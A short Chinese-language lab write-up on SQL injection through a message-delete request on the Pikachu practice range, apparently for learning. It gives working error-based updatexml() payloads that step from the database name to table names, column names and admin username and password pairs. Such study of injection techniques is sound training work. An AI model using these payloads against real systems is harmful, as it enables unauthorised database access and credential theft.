Delete 注入

Delete 注入

delete注入类型利用bp需要抓包，在靶场输入留言后有删除按钮，点击会像后台发包，我们可以利用这一点向数据库注入

Delete 注入：攻击的是“谁被删除”这个判断条件。

第一步：依旧是找数据库

在id那里修改id的值。

id=58+or+updatexml(1,concat(0x7e,database(),0x7e),1)

为什么有+？

HTTP 协议规定： URL 地址里不能出现原始的空格！一旦服务器（Apache/Nginx）在 URL 里读到空格，它就会觉得“这请求格式不对啊”，直接给你退回一个 400 Bad Request。

接下来依旧是：爆表名 -> 爆列名 -> 爆数据。

只不过具体的语法有区别：因为要特定的针对数据库语法（增删改查）中的删。

第二步：爆表名 (找找有没有 users 表)

去 information_schema.tables​ 里翻翻 pikachu 库下面有哪些表。

​58+or+updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),0x7e),1)

这里还是通过修改limit+0,1 来翻表

第三步：爆列名 (确认账号密码叫什么)

翻到了 users 表，现在我们要看它的列名。

​58+or+updatexml(1,concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name='users'+limit+0,1),0x7e),1)

第四步：爆数据 (拿管理员账号密码)

从 users​ 表里提取 admin 的账号和密码。

​58+or+updatexml(1,concat(0x7e,(select+concat(username,0x3a,password)+from+users+limit+0,1),0x7e),1)

遇到加密的密码还是使用​​substr(password, 1, 16)

‍

最后

‍

其实总体的思路与之前都是一样的，进数据库->爆表名 -> 爆列名 -> 爆数据。 只不过具体的有具体的语法区别而已。换汤不换药。